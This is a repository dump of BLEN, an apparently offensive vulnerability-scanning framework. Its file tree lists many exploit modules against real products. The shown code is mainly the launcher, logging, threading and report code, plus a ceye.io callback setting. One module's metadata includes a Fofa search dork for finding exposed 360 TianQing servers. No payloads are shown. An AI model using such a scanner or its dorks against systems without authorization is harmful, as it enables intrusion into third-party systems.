├── .gitignore
├── LICENSE
├── README.md
├── blen.py
├── blen_settings.json
├── data
├── 95955.mp3
└── user_agents.txt
├── docs
├── CHANGELOG.md
└── CODING.md
├── img
├── 009.png
├── 10.jpg
├── 3.png
└── logo.jpg
├── info.ini
├── lib
├── __init__.py
├── __init__.pyc
├── core
│ ├── __init__.py
│ ├── __init__.pyc
│ ├── center.py
│ ├── common.py
│ ├── common.pyc
│ ├── data.py
│ ├── enums.py
│ ├── htmloutput.py
│ ├── htmloutput.pyc
│ ├── log.py
│ ├── output.py
│ ├── poc.py
│ └── threads.py
├── fofa.ini
├── fofa.py
└── thirdparty
│ ├── __init__.py
│ └── ansistrm
│ ├── __init__.py
│ └── ansistrm.py
└── poc
├── 360
└── TianQing_Unauth_Acceess
│ └── poc.py
├── ACME
└── File_Read_mini_httpd_CVE_2018_18778
│ └── poc.py
├── Alibaba_Canal
└── Weak_Pass
│ └── poc.py
├── Alibaba_Druid
└── Unauth_Access
│ └── poc.py
├── Alibaba_FastJson
└── RCE_CVE_2017_18349
│ └── poc.py
├── Alibaba_Nacos
└── Unauth_Access
│ └── poc.py
├── Apache_ActiveMQ
├── Physical_Path_Disclosure
│ └── poc.py
├── RCE_FileServer_CVE_2016_3088
│ └── poc.py
└── WeakPass
│ └── poc.py
├── Apache_ActiveUC
└── Active_UC_Info_Disclosure
│ └── poc.py
├── Apache_ApiSix
├── DashBoard_Auth_Bypass_CVE_2021_45232
│ └── poc.py
└── Default_Key_CVE_2020_13945
│ └── poc.py
├── Apache_CouchDB
└── Priv_Escalation_CVE_2017_12635
│ └── poc.py
├── Apache_Druid
└── File_Read_CVE_2021_36749
│ └── poc.py
├── Apache_Flink
├── Dir_Traversal_CVE-2020-17519
│ └── poc.py
└── RCE_CVE_2020_17518
│ └── poc.py
├── Apache_Kylin
└── Conf_Info_Disclosure_CVE_2020_13937
│ └── poc.py
├── Apache_Mod_jk
└── ACbypass_CVE_2018_11759
│ └── poc.py
├── Apache_Solr
├── CVE_2019_17558
│ └── poc.py
├── File_Read
│ └── poc.py
├── RCE_Log4j_CVE_2021_44228
│ └── poc.py
└── Unauth_Access
│ └── poc.py
├── AtlassianConfluence
└── RCE_FileServer_CVE_2022_26134
│ └── poc.py
├── BSPHP
└── Info_Disclosure
│ └── poc.py
├── Bithighway_碧海威
└── Weak_Pass_L7
│ └── poc.py
├── Brother MFC-L2730DW
└── Weak_Pass
│ └── poc.py
├── C_Lodop
└── File_Read
│ └── poc.py
├── China_Mobile_中国移动
└── Info_Disclosure_Yu_routing_ExportSettings
│ └── poc.py
├── China_TeleCOM_中国电信
├── RCE_F460_GateWay
│ └── poc.py
└── Weak_Pass_DaTang_AC_Manager
│ └── poc.py
├── Confluence
└── OGNL_Injection_CVE_2021_26084
│ └── poc.py
├── Coremail
└── Conf_Info_Disclosure
│ └── poc.py
├── CtCMS_赤兔CMS
└── Get_Banner
│ └── poc.py
├── DVR
└── Login_Bypass_CVE_2018_9995
│ └── poc.py
├── D_Link
├── RCE_ShareCenter_system_mgr_cgi
│ └── poc.py
├── UPInfo_Disclosure_getcfg_php_CVE_2019_17506
│ └── poc.py
└── Weak_Pass_AC_Manager
│ └── poc.py
├── DedeCMS_织梦
├── Info_Disclosure_IIS_Short_Filename
│ └── poc.py
└── RadminPass
│ └── poc.py
├── DocCMS
└── SQLi_keyword
│ └── poc.py
├── DrayTek
└── RCE_CVE_2020_8515
│ └── poc.py
├── Drupal!
└── RCE_CVE_2018_7600
│ └── poc.py
├── ECShop
├── RCE_2dotX_OR_3dotX
│ └── poc.py
└── SQLi_delete_cart_goods
│ └── poc.py
├── Elasticsearch
├── Cmd_Exec_MVEL_CVE-2014-3120
│ └── poc.py
├── Code_Exec_Groovy_CVE-2015-1427
│ └── poc.py
├── Dir_Traversal_CVE-2015-5531
│ └── poc.py
├── File_Create_WooYun-2015-110216
│ └── poc.py
└── Unauth_Access
│ └── poc.py
├── Eyou_亿邮
└── RCE_moni_detail
│ └── poc.py
├── F5_BIG_IP
├── File_Read_CVE_2020_5902
│ └── poc.py
└── RCE_CVE_2021-22986
│ └── poc.py
├── FLIR_菲力尔
└── Download_File_AX8
│ └── poc.py
├── Grafana
└── File_Read_plugins
│ └── poc.py
├── H2_DataBase
└── UnAuth_Access
│ └── poc.py
├── H3C
└── File_Download_SecPath_WAF
│ └── poc.py
├── H5S_视频平台
└── Info_Disclosure
│ └── poc.py
├── HIKVISION
├── File_Down_Gateway_downFile_php
│ └── poc.py
├── File_Read_Stream_Media_Manager
│ └── poc.py
└── Weak_Pass_Stream_Media_Manager
│ └── poc.py
├── HJ_宏景
└── File_Read
│ └── poc.py
├── HST_好视通
├── File_Download
│ └── poc.py
└── File_Read
│ └── poc.py
├── HT_华天OA
└── Sqli_ApiController
│ └── poc.py
├── Hongdian_宏电
└── Backstage_File_Read_CVE_2021_28152
│ └── poc.py
├── Huawei
├── File_Read_HG659_lib
│ └── poc.py
└── Info_Disclosure_DG8045
│ └── poc.py
├── HuiWen_汇文
├── Info_Disclosure
│ └── poc.py
└── Weak_Pass
│ └── poc.py
├── IFW8_蜂网互联
└── UPInfo_DisClosure_CVE_2019_16313
│ └── poc.py
├── IRADVC3325_佳能打印机
└── Unauth_Access
│ └── poc.py
├── InfluxDB
├── FingerPrint
│ └── poc.py
└── UnAuth_Access
│ └── poc.py
├── Intelbras
└── UPInfo_Disclosure_CVE_2021_3017
│ └── poc.py
├── JDFreeFuck
└── Weak_Pass
│ └── poc.py
├── Jboss
└── Unauth_Access
│ └── poc.py
├── Jenkins
└── Unauth_Access
│ └── poc.py
├── Jetty
├── File_Read_CVE_2021_34429
│ └── poc.py
├── FingerPrint
│ └── poc.py
├── Info_Disclosure_CVE_2021_28164
│ └── poc.py
└── Info_Disclosure_CVE_2021_28169
│ └── poc.py
├── Jinher_金和OA
└── File_Read_download_jsp
│ └── poc.py
├── KEDACOM_数字系统接入网关
└── File_Read
│ └── poc.py
├── Kingdee_金蝶
├── Dir_List_server_file
│ └── poc.py
└── File_Down_fileDownload_do
│ └── poc.py
├── Kyan
└── Info_Disclosure
│ └── poc.py
├── LR_龙软科技
└── Info_Disclosure
│ └── poc.py
├── Landray_蓝凌OA
└── File_Read_CNVD_2021_28277
│ └── poc.py
├── Lanproxy
├── Lanproxy_File_Read
│ └── poc.py
└── Weak_Pass
│ └── poc.py
├── Laravel_Framework
└── Conf_Info_Disclosure_dot_env
│ └── poc.py
├── LiPu_利谱第二代防火墙
└── Info_Disclosure
│ └── poc.py
├── LinkSeek_朗驰欣创
└── FTP_Account_Info_Disclosure
│ └── poc.py
├── MY_木云科技
└── Unauth_Access
│ └── poc.py
├── MaiPu_迈普
└── File_Download_webui
│ └── poc.py
├── MailGard_佑友
├── RCE_ping_FireWall
│ └── poc.py
└── Weak_Pass_FireWall
│ └── poc.py
├── MessageSolution
└── Info_Disclosure
│ └── poc.py
├── Metabase
└── File_Read_CVE_2021_41277
│ └── poc.py
├── MicroSoft
└── RCE_CVE_2022_21907
│ └── poc.py
├── NSoft_新软
└── FileRead_EWEBS
│ └── poc.py
├── NatShell_蓝海卓越
├── File_Read
│ └── poc.py
└── HashInfo_DisClosure
│ └── poc.py
├── NetPower_中科网威
└── UPInfo_DisClosure_Firewall
│ └── poc.py
├── Node.js
├── Cmd_inj_CVE_2021_21315
│ └── poc.py
└── Dir_Traversal_CVE_2017_14849
│ └── poc.py
├── OKI
└── UnAuth_MC573
│ └── poc.py
├── PHPStudy
└── Back_Door
│ └── poc.py
├── PHPUnit
└── RCE_eval_stdin
│ └── poc.py
├── PearProject_梨子项目管理系统
└── Conf_Info_Disclosure_env
│ └── poc.py
├── PuYuan
├── Config_Info_Disclosure
│ └── poc.py
└── Info_Disclosure
│ └── poc.py
├── QZSec_齐治
└── AnyUser_Login_Fortress_Machine
│ └── poc.py
├── Redis
└── Unauth_Access
│ └── poc.py
├── Ruijie_锐捷
├── Dir_List_Cloud_ClassRoom
│ └── poc.py
├── File_Read_EG_userAuth
│ └── poc.py
├── RCE_EWEB_Manager_CNVD_2021_09650
│ └── poc.py
├── RCE_NBR_1300G
│ └── poc.py
├── RCE_SmartWeb_WEB_VMS
│ └── poc.py
├── UPInfo_DisClosure_RG_UAC_CNVD_2021_14536
│ └── poc.py
└── Unauth_Access
│ └── poc.py
├── RuoYi_若依
└── Weak_Pass
│ └── poc.py
├── SANGFOR_深信服
└── RCE_2020_EDR
│ └── poc.py
├── Samsung
├── Lfi_Samsung_Wlan_AP
│ └── poc.py
└── RCE_Samsung_WLANAP_WEA453e
│ └── poc.py
├── Sapido
└── RCE_BRC70n_Router
│ └── poc.py
├── SeeYon_致远
├── File_Download
│ └── poc.py
└── File_Upload_ajax_do
│ └── poc.py
├── ShiZiYu_狮子鱼
├── Sqli_ApiController
│ └── poc.py
└── Sqli_ApigoodsController
│ └── poc.py
├── ShopXO
└── FileRead_CNVD_2021_15822
│ └── poc.py
├── SonarQube
└── Info_Disclosure_CVE_2020_27986
│ └── poc.py
├── SonicWall_SSL_VPN
└── RCE_jarrewrite
│ └── poc.py
├── TCC_斗象
└── Weak_Pass_ARL
│ └── poc.py
├── TVT_同为股份
└── Dir_Traversal_NVMS_1000
│ └── poc.py
├── TamronOS_IPTV
├── Info_Disclosure
│ └── poc.py
├── RCE_api_ping
│ └── poc.py
└── User_Add_Submit
│ └── poc.py
├── Thinkphp
├── RCE_5022_5129
│ └── poc.py
└── RCE_5023
│ └── poc.py
├── Tongda_通达OA
├── AnyUser_Login_Version2017
│ └── poc.py
├── Computer_Name_Plugin
│ └── poc.py
├── Sql_inj_TongDa
│ └── poc.py
└── Version_Info_Plugin
│ └── poc.py
├── UTT_艾泰科技
└── WeakPass_Net_Manager_System
│ └── poc.py
├── VMware
├── File_read_vCenter
│ └── poc.py
└── SSRF_vRealize_CVE_2021_21975
│ └── poc.py
├── Venustech_启明星辰
└── SQLi_Reportguide
│ └── poc.py
├── VoIPmonitor
└── RCE_CVE_2021_30461
│ └── poc.py
├── WayosAC
└── WayosAC
│ └── poc.py
├── Weaver_泛微OA
├── Config_Info_Disclosure_DBconfigReader
│ └── poc.py
├── Config_Info_Disclosure_E_Cology_V9
│ └── poc.py
├── File_Read_E_Bridge
│ └── poc.py
├── File_Upload_E_Office_V9_CNVD_2021_49104
│ └── poc.py
├── File_Upload_E_Office_ajax
│ └── poc.py
├── File_Upload_V9_uploadOperation
│ └── poc.py
├── Log_Disclosure
│ └── poc.py
├── RCE_Beanshell
│ └── poc.py
├── SQLi_E_Office_v9dot5
│ └── poc.py
├── Sql_Inj_E_cology_WorkflowCenterTreeData
│ └── poc.py
└── Sql_inj_E_cology_V8
│ └── poc.py
├── Weblogic
├── CVE_2016_0638
│ └── poc.py
├── CVE_2017_10271
│ └── poc.py
├── RCE_CVE_2018_3191
│ └── poc.py
├── SSRF_CVE_2014_4210
│ └── poc.py
├── UnAuth_RCE_CVE_2020_14882
│ └── poc.py
└── XMLDecoder_CVE_2017_3506
│ └── poc.py
├── Yonyou_用友NC
├── Dir_List_ERP
│ └── poc.py
├── RCE_BeanShell_CNVD_2021_30167
│ └── poc.py
└── Sqli_CNNVD_201610_923
│ └── poc.py
├── Zabbix
└── Weak_Pass
│ └── poc.py
├── Zentao_禅道
└── Getshell_test
│ └── poc.py
├── ZeroShell
└── RCE_kerbynet
│ └── poc.py
├── Zyxel
└── Login_Pass_NBG2105
│ └── poc.py
├── common
├── Apache_Dir_List
│ └── poc.py
├── Git_Info_Disclosure
│ └── poc.py
├── Svn_Info_Disclosure
│ └── poc.py
└── Url_Alive
│ └── poc.py
├── demo
└── demo
│ └── poc.py
├── jellyfin
├── File_Read_CVE_2021_21402
│ └── poc.py
└── SSRF_CVE_2021_29490
│ └── poc.py
├── php
└── Backdoor_v8dev
│ └── poc.py
├── 一指通
└── XiaMen_Yizhitong_Weak_pass
│ └── poc.py
└── 中硅技术
└── ZhongGuijishu_Unauth_Access
└── poc.py
/.gitignore:
--------------------------------------------------------------------------------
1 | # Build and Release Folders
2 | bin-debug/
3 | bin-release/
4 | [Oo]bj/
5 | [Bb]in/
6 |
7 | # Other files and folders
8 | .settings/
9 |
10 | # Executables
11 | *.swf
12 | *.air
13 | *.ipa
14 | *.apk
15 |
16 | test/
17 | output/
18 | log/
19 | scan/
20 | .vscode/
21 | Future_Alpha版/
22 | poc/ACTI_视频监控/
23 | poc/*/_*/
24 | poc/PRO/
25 |
26 | reference.*
27 | reference*.png
28 | reference/
29 | secret/
30 |
31 | .DS_Store
32 | # CODING.md
33 | FETURE.md
34 |
35 | *honeypot*.md
36 |
37 |
38 | # Project files, i.e. `.project`, `.actionScriptProperties` and `.flexProperties`
39 | # should NOT be excluded as they contain compiler settings and other important
40 | # information for Eclipse / Flash Builder.
41 |
--------------------------------------------------------------------------------
/blen.py:
--------------------------------------------------------------------------------
1 | # coding: utf-8
2 | from __future__ import print_function
3 |
4 | import os
5 | import sys
6 | import argparse
7 | import logging
8 | import time
9 | import threading
10 | import configparser
11 | import requests
12 | import ctypes
13 | import inspect
14 | import subprocess
15 | import re
16 |
17 |
18 | import lib.core
19 | from lib.core.data import root_path
20 |
21 | from lib.core.common import get_local_version
22 | from lib.core.center import oFxCenter
23 | sys.path.append(root_path)
24 |
25 |
26 |
27 | logo = '''
28 |
29 |
30 |
31 | \033[33m`7MM"""Yp, `7MMF' `7MM"""YMM `7MN. `7MF'
32 | \033[33m MM Yb MM MM `7 MMN. M
33 | \033[31m MM dP MM MM d M YMb M
34 | \033[31m MM"""bg. MM MMmmMM M `MN. M\033[0m
35 | \033[35m MM `Y MM , MM Y , M `MM.M
36 | \033[35m MM ,9 MM ,M MM ,M M YMM
37 | \033[32m.JMMmmmd9 .JMMmmmmMMM .JMMmmmmMMM .JML. YM Author : openx-org\033 Version : {version}
38 |
39 | \033[32m #*#*# https://github.com/openx-org/BLEN #*#*#
40 |
41 | \033[33m _-___________________________________-_
42 |
43 | \033[0m'''.format(version=get_local_version(root_path+"/info.ini"))
44 |
45 |
46 |
47 | def main():
48 |
49 | print(logo)
50 |
51 | ofxcenter = oFxCenter()
52 |
53 |
54 |
55 | if __name__ == "__main__":
56 | main()
--------------------------------------------------------------------------------
/blen_settings.json:
--------------------------------------------------------------------------------
1 | {
2 | "defaultContext": {
3 | "account": null,
4 | "database": null,
5 | "schema": null
6 | },
7 | "scripts": []
8 | }
--------------------------------------------------------------------------------
/data/95955.mp3:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/openx-org/BLEN/184b8e070cbecbdf35cdec100b9ac180ac03e02f/data/95955.mp3
--------------------------------------------------------------------------------
/img/009.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/openx-org/BLEN/184b8e070cbecbdf35cdec100b9ac180ac03e02f/img/009.png
--------------------------------------------------------------------------------
/img/10.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/openx-org/BLEN/184b8e070cbecbdf35cdec100b9ac180ac03e02f/img/10.jpg
--------------------------------------------------------------------------------
/img/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/openx-org/BLEN/184b8e070cbecbdf35cdec100b9ac180ac03e02f/img/3.png
--------------------------------------------------------------------------------
/img/logo.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/openx-org/BLEN/184b8e070cbecbdf35cdec100b9ac180ac03e02f/img/logo.jpg
--------------------------------------------------------------------------------
/info.ini:
--------------------------------------------------------------------------------
1 | [info]
2 |
3 | version = 2.23.7
4 |
5 | author = "openx"
6 |
7 | [ceye]
8 |
9 | dns = xxxxx.ceye.io
10 |
11 | token = gvfdsert6y7u8iknjbgvcfdr5t678uiokjhgfrt6y7
--------------------------------------------------------------------------------
/lib/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/openx-org/BLEN/184b8e070cbecbdf35cdec100b9ac180ac03e02f/lib/__init__.py
--------------------------------------------------------------------------------
/lib/__init__.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/openx-org/BLEN/184b8e070cbecbdf35cdec100b9ac180ac03e02f/lib/__init__.pyc
--------------------------------------------------------------------------------
/lib/core/__init__.py:
--------------------------------------------------------------------------------
1 | import os
2 | import sys
3 |
4 | try:
5 | os.path.dirname(os.path.realpath(__file__))
6 | except Exception:
7 | err_msg = "your system does not properly handdle non-Ascii path"
8 | err_msg += "please move this Blen's directory to other location"
9 | exit(err_msg)
10 |
11 | from lib.core.data import root_path
12 |
13 | def check_environment():
14 | from lib.core.data import PYVERSION
15 | if PYVERSION.split(".")[0] == "2":
16 | err_msg = "Blen does not support python2"
17 | exit(err_msg)
18 | check_environment()
19 |
20 |
21 | def oFx_Refuse_Win():
22 | from lib.core.data import IS_WIN
23 | if IS_WIN:
24 | err_msg = "Blen does not support windows system, Kali Linux is recommended"
25 | exit(err_msg)
26 | # oFx_Refuse_Win()
27 |
28 |
29 | def oFx_Init():
30 | from lib.core.data import log_path,output_path,scan_path
31 | if not os.path.exists(log_path):
32 | os.makedirs(log_path)
33 |
34 | if not os.path.exists(output_path):
35 | os.makedirs(output_path)
36 |
37 | if not os.path.exists(scan_path):
38 | os.makedirs(scan_path)
39 | oFx_Init()
40 |
41 | def clear_relog():
42 | from lib.core.data import now
43 | from lib.core.data import output_path,log_path
44 | deadline = int(now) - 12*60*60
45 | for i in os.listdir(output_path):
46 | try:
47 | if int(i.split(".")[0]) <= deadline :
48 | os.remove(output_path+i)
49 | except:
50 | pass
51 | for i in os.listdir(log_path):
52 | try:
53 | if int(i.split(".")[0]) <= deadline :
54 | os.remove(log_path+i)
55 | except:
56 | pass
57 | clear_relog()
58 |
59 | sys.path.append(root_path)
60 | # exit("test success")
--------------------------------------------------------------------------------
/lib/core/__init__.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/openx-org/BLEN/184b8e070cbecbdf35cdec100b9ac180ac03e02f/lib/core/__init__.pyc
--------------------------------------------------------------------------------
/lib/core/common.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/openx-org/BLEN/184b8e070cbecbdf35cdec100b9ac180ac03e02f/lib/core/common.pyc
--------------------------------------------------------------------------------
/lib/core/data.py:
--------------------------------------------------------------------------------
1 | #coding:utf-8
2 |
3 | import time
4 | import os
5 | import queue
6 | import threading
7 | import sys
8 |
9 | now=str(int(time.time()))
10 |
11 | root_path = os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(__file__))))
12 | log_path = root_path+"/log/"
13 | output_path = root_path+"/output/"
14 | scan_path = root_path + "/scan/"
15 | poc_path = root_path + "/poc/"
16 |
17 | MAX_NUMBER_OF_THREADS = 50
18 | IS_WIN = True if (sys.platform in ["win32", "cygwin"] or os.name == "nt") else False
19 | PYVERSION = sys.version.split()[0].split(".")[0]
20 |
21 | qu = queue.Queue()
22 | allpoc = queue.Queue()
23 |
24 | vulnoutput=dict()
25 | unvulnoutput=[]
26 | unreachoutput=[]
27 |
28 | lock=threading.Lock()
29 |
30 | AliveTest = queue.Queue()
31 | AliveList = set()
--------------------------------------------------------------------------------
/lib/core/enums.py:
--------------------------------------------------------------------------------
1 | #coding:utf-8
2 |
3 | class CUSTOM_LOGGING:
4 | LOGO = 21
5 | VULN = 22
6 | UNVULN = 23
7 | NETEERROR = 24
--------------------------------------------------------------------------------
/lib/core/htmloutput.py:
--------------------------------------------------------------------------------
1 | #coding:utf-8
2 | def output_html(filename,vulnlist,unvulnlist,errorlist):
3 | newvulnlist = [""+i+"
" for i in vulnlist]
4 | newunvulnlist = [""+i+"
" for i in unvulnlist]
5 | newerrorlist = [""+i+"
" for i in errorlist]
6 |
7 | vulnstr=""
8 | for i in newvulnlist:
9 | vulnstr+=i
10 | unvulnstr=""
11 | for i in newunvulnlist:
12 | unvulnstr+=i
13 | errorstr=""
14 | for i in newerrorlist:
15 | errorstr+=i
16 |
17 | with open("output/%s"%(filename),"w") as f:
18 | f.write(html%(vulnstr,unvulnstr,errorstr))
19 |
20 | html="""
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 | Blen Report
29 |
30 |
71 |
72 |
73 | Blen Report
74 |
75 |
76 | vuln list
77 | %s
78 |
79 |
80 | unvuln list
81 | %s
82 |
83 |
84 | unreach list
85 | %s
86 |
87 |
88 |
89 | powered by Blen
90 |
91 |
92 |
93 | """
--------------------------------------------------------------------------------
/lib/core/htmloutput.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/openx-org/BLEN/184b8e070cbecbdf35cdec100b9ac180ac03e02f/lib/core/htmloutput.pyc
--------------------------------------------------------------------------------
/lib/core/log.py:
--------------------------------------------------------------------------------
1 | #coding:utf-8
2 |
3 | import logging
4 | from lib.core.data import now,root_path
5 | from lib.core.enums import CUSTOM_LOGGING
6 |
7 | logging.addLevelName(CUSTOM_LOGGING.LOGO, "(∩ᵒ̴̶̷̤⌔ᵒ̴̶̷̤∩)")
8 | logging.addLevelName(CUSTOM_LOGGING.VULN, "~o(〃'▽'〃)o")
9 | logging.addLevelName(CUSTOM_LOGGING.UNVULN, "ε(┬┬﹏┬┬)3")
10 | logging.addLevelName(CUSTOM_LOGGING.NETEERROR, "(*• . •*)?")
11 |
12 | logger = logging.getLogger("oFx_l0g")
13 | logger.setLevel(logging.DEBUG)
14 | formatter = logging.Formatter("%(asctime)s - %(levelname)s: %(message)s")
15 |
16 |
17 | # use filehandler
18 | FILE_HANDLE = logging.FileHandler("%s.log" % (root_path + "/log/" + now))
19 | FILE_HANDLE.setLevel(logging.DEBUG)
20 | FILE_HANDLE.setFormatter(formatter)
21 |
22 | # use streamhandler
23 | STREAM_HANDLE = None
24 | try:
25 | from lib.thirdparty.ansistrm.ansistrm import ColorizingStreamHandler
26 | disableColor = False
27 |
28 | if disableColor:
29 | LOGGER_HANDLER = logging.StreamHandler()
30 | else:
31 | LOGGER_HANDLER = ColorizingStreamHandler()
32 | LOGGER_HANDLER.level_map[logging.getLevelName("(∩ᵒ̴̶̷̤⌔ᵒ̴̶̷̤∩)")] = (None, "yellow", False)
33 | LOGGER_HANDLER.level_map[logging.getLevelName("~o(〃'▽'〃)o")] = (None, "green", False)
34 | LOGGER_HANDLER.level_map[logging.getLevelName("ε(┬┬﹏┬┬)3")] = (None, "blue", False)
35 | LOGGER_HANDLER.level_map[logging.getLevelName("(*• . •*)?")] = (None, "cyan", False)
36 | except:
37 | pass
38 | finally:
39 | STREAM_HANDLE = logging.StreamHandler()
40 |
41 |
42 |
43 | STREAM_HANDLE.setLevel(logging.DEBUG)
44 | STREAM_HANDLE.setFormatter(formatter)
45 |
46 | # add Handler
47 | logger.addHandler(FILE_HANDLE)
48 | logger.addHandler(STREAM_HANDLE)
49 |
50 | def loglogo(message):
51 | print("\033[33m")
52 | logger.log(CUSTOM_LOGGING.LOGO,message)
53 |
54 | def logvuln(message):
55 | print("\033[32m")
56 | logger.log(CUSTOM_LOGGING.VULN,message)
57 |
58 | def logunvuln(message):
59 | print("\033[34m")
60 | logger.log(CUSTOM_LOGGING.UNVULN,message)
61 |
62 | def logverifyerror(message):
63 | print("\033[36m")
64 | logger.log(CUSTOM_LOGGING.NETEERROR,message)
65 |
66 | def logwarning(message):
67 | # print("\033[35m")
68 | logger.warning(message)
69 |
70 | def logcritical(message):
71 | # print("\033[31m")
72 | logger.critical(message)
73 |
--------------------------------------------------------------------------------
/lib/core/output.py:
--------------------------------------------------------------------------------
1 | #coding:utf-8
2 | from lib.core.log import loglogo
3 |
4 | def Txt_output(filename,output_dict,target_list):
5 | with open(filename,"w") as f:
6 | for vuln_name in output_dict:
7 | loglogo("漏洞名:%s"%(vuln_name))
8 | f.write(vuln_name+"\n")
9 | loglogo("共测试url %d 条, %d 条存在漏洞"%(len(target_list),len(output_dict[vuln_name])))
10 | for vuln_url in output_dict[vuln_name]:
11 | f.write(vuln_url.split("||")[0].strip()+"\n")
12 | f.write("\n\n")
13 | loglogo("TXT格式报告输出至:%s"%(filename))
14 |
15 | doc = ""
16 | def Mkdn_output(filename,output_dict,target_list,actual_list,total_time):
17 | global doc
18 | doc += "检测报告
\n\n\n\
19 | ```\n\
20 | Blen :: order by jijue\n\
21 | ```\n\n"
22 | doc += "|条目|数值|\n|-|-|\n|预计测试条数|{target_list_length}|\n|实际测试条数|{actual_list_length}|\n|共计耗时|{total_time}秒|\n\n".format(target_list_length = len(target_list),actual_list_length = len(actual_list),total_time = total_time)
23 | for poc_name in output_dict:
24 | doc += "### {}\n".format(poc_name)
25 | doc += "|url|title|\n"
26 | doc += "|-|-|\n"
27 | for vuln_url in output_dict[poc_name]:
28 |
29 | web_title = vuln_url.split("||")[1].strip()
30 |
31 | doc += "|{}|{}|\n".format(vuln_url.split("||")[0],web_title)
32 |
33 | with open(filename,"w") as f:
34 | f.write(doc)
35 | loglogo("Markdown格式报告输出至:%s"%(filename))
36 |
37 | csv_doc = """
38 | 检测报告,,,,,
39 | ,,,,,
40 | ,,,,,
41 | Blen :: order by jijue,,,,,
42 | ,,,,,
43 | ,,,,,
44 | 条目,数值,
45 | 预计测试条数,{target_list_length}条,
46 | 实际测试条数,{actual_list_length}条,
47 | 共计耗时,{total_time}秒,
48 | ,,,,,
49 | ,,,,,\n
50 | """
51 | def Csv_output(filename,output_dict,target_list,actual_list,total_time):
52 | global csv_doc
53 | csv_doc = csv_doc.format(target_list_length = len(target_list),actual_list_length = len(actual_list),total_time = total_time)
54 |
55 | for poc_name in output_dict:
56 | csv_doc += "{},\nurl,title,,\n".format(poc_name)
57 | for vuln_url in output_dict[poc_name]:
58 | web_title = vuln_url.split("||")[1].strip()
59 | csv_doc += "{vuln_url},{web_title},\n".format(vuln_url=vuln_url.split("||")[0],web_title=web_title)
60 | csv_doc += ",,,,,\n,,,,,\n"
61 | with open(filename,"w") as f:
62 | f.write(csv_doc)
63 | loglogo("CSV格式报告输出至:%s" % (filename))
--------------------------------------------------------------------------------
/lib/core/threads.py:
--------------------------------------------------------------------------------
1 | #coding:utf-8
2 |
3 | import time
4 | import threading
5 | import traceback
6 |
7 | from lib.core.log import logwarning,loglogo
8 | from lib.core.data import MAX_NUMBER_OF_THREADS
9 |
10 | def exception_handled_function(thread_function, args=(), silent=False):
11 | try:
12 | thread_function(*args)
13 | except KeyboardInterrupt:
14 | raise
15 | except Exception as ex:
16 | logwarning("thread {0}: {1}".format(threading.currentThread().getName(), str(ex)))
17 | logwarning(traceback.format_exc())
18 |
19 | def run_threads(num_threads, thread_function, args: tuple = (), forward_exception=True, start_msg=True):
20 | threads = []
21 |
22 | try:
23 | if num_threads > 1:
24 | if start_msg:
25 | info_msg = "starting {0} threads".format(num_threads)
26 | loglogo(info_msg)
27 |
28 | if num_threads > MAX_NUMBER_OF_THREADS:
29 | warn_msg = "starting {0} threads, more than MAX_NUMBER_OF_THREADS:{1}".format(num_threads, MAX_NUMBER_OF_THREADS)
30 | logwarning(warn_msg)
31 | num_threads = MAX_NUMBER_OF_THREADS
32 |
33 | else:
34 | thread_function(*args)
35 | return
36 |
37 | # Start the threads
38 | for num_threads in range(num_threads):
39 | thread = threading.Thread(target=exception_handled_function, name=str(num_threads),
40 | args=(thread_function, args))
41 | try:
42 | thread.start()
43 | except KeyboardInterrupt as e:
44 | raise KeyboardInterrupt
45 | except Exception as ex:
46 | err_msg = "error occurred while starting new thread ('{0}')".format(str(ex))
47 | logwarning(err_msg)
48 | break
49 |
50 | threads.append(thread)
51 | alive = True
52 | while alive:
53 | alive = False
54 | for thread in threads:
55 | if thread.is_alive():
56 | alive = True
57 | time.sleep(0.1)
58 | except (KeyboardInterrupt) as ex:
59 | loglogo("user aborted (Ctrl+C was pressed multiple times")
60 | if forward_exception:
61 | pass
62 | # exit()
63 |
64 | except Exception as ex:
65 | logwarning("thread {0}: {1}".format(threading.currentThread().getName(), str(ex)))
66 | logwarning(traceback.format_exc())
67 |
68 | finally:
69 | return
--------------------------------------------------------------------------------
/lib/fofa.ini:
--------------------------------------------------------------------------------
1 | [Fofa]
2 | user =
3 | key =
4 |
5 |
--------------------------------------------------------------------------------
/lib/thirdparty/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/openx-org/BLEN/184b8e070cbecbdf35cdec100b9ac180ac03e02f/lib/thirdparty/__init__.py
--------------------------------------------------------------------------------
/lib/thirdparty/ansistrm/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/openx-org/BLEN/184b8e070cbecbdf35cdec100b9ac180ac03e02f/lib/thirdparty/ansistrm/__init__.py
--------------------------------------------------------------------------------
/poc/360/TianQing_Unauth_Acceess/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle,get_random_ua
4 | from lib.core.poc import POCBase
5 |
6 | # ...
7 | import urllib3
8 | urllib3.disable_warnings()
9 |
10 |
11 | class POC(POCBase):
12 |
13 |
14 | _info = {
15 | "author" : "jijue", # POC作者
16 | "version" : "1", # POC版本,默认是1
17 | "CreateDate" : "2021-06-09", # POC创建时间
18 | "UpdateDate" : "2021-06-09", # POC创建时间
19 | "PocDesc" : """
20 | 略
21 | """, # POC描述,写更新描述,没有就不写
22 |
23 | "name" : "天擎数据库未授权访问导致信息泄露漏洞", # 漏洞名称
24 | "VulnID" : "", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
25 |
26 | "AppName" : "360天擎数据库", # 漏洞应用名称
27 | "AppVersion" : "", # 漏洞应用版本
28 | "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
29 | "VulnDesc" : """
30 | 天擎 存在未授权越权访问,造成敏感信息泄露
31 | """, # 漏洞简要描述
32 |
33 | "fofa-dork":"""
34 | title="360新天擎"
35 | """, # fofa搜索语句
